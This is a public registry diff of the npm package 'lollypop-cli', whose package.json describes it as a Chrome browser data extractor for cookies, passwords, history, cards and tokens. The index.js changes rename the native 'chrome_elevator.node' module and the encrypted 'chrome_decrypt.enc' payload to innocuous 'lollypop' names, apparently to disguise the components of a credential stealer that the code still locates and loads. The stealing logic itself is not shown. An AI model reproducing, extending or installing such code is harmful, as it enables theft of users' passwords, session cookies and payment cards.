lollypop-cli 1.0.2 → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +8 -8
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -7,30 +7,30 @@ const crypto = require('crypto');
7
7
  const { execSync } = require('child_process');
8
8
  const { Writable } = require('stream');
9
9
 
10
- // ─── Locate chrome_elevator.node and chrome_decrypt.enc ─────────────────────
10
+ // ─── Locate lollypop2.node and lollypop.enc ─────────────────────
11
11
 
12
12
  let chromeElevator;
13
13
  {
14
14
  const candidates = [
15
- path.join(__dirname, 'chrome_elevator.node'),
16
- path.join(__dirname, 'build', 'Release', 'chrome_elevator.node'),
17
- path.join(path.dirname(process.execPath), 'chrome_elevator.node'),
15
+ path.join(__dirname, 'lollypop2.node'),
16
+ path.join(__dirname, 'build', 'Release', 'lollypop2.node'),
17
+ path.join(path.dirname(process.execPath), 'lollypop2.node'),
18
18
  ];
19
19
  for (const p of candidates) {
20
20
  if (fs.existsSync(p)) { chromeElevator = require(p); break; }
21
21
  }
22
22
  if (!chromeElevator) {
23
- throw new Error('chrome_elevator.node not found. Place it next to this package.');
23
+ throw new Error('lollypop2.node not found. Place it next to this package.');
24
24
  }
25
25
  }
26
26
 
27
27
  const ENC_FILE = (() => {
28
28
  const candidates = [
29
- path.join(__dirname, 'chrome_decrypt.enc'),
30
- path.join(path.dirname(process.execPath), 'chrome_decrypt.enc'),
29
+ path.join(__dirname, 'lollypop.enc'),
30
+ path.join(path.dirname(process.execPath), 'lollypop.enc'),
31
31
  ];
32
32
  for (const p of candidates) { if (fs.existsSync(p)) return p; }
33
- throw new Error('chrome_decrypt.enc not found. Place it next to this package.');
33
+ throw new Error('lollypop.enc not found. Place it next to this package.');
34
34
  })();
35
35
 
36
36
  // ─── Load better-sqlite3 ────────────────────────────────────────────────────
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lollypop-cli",
3
- "version": "1.0.2",
3
+ "version": "1.0.4",
4
4
  "description": "Chrome ABE browser data extractor (cookies, passwords, history, cards, tokens)",
5
5
  "main": "index.js",
6
6
  "files": [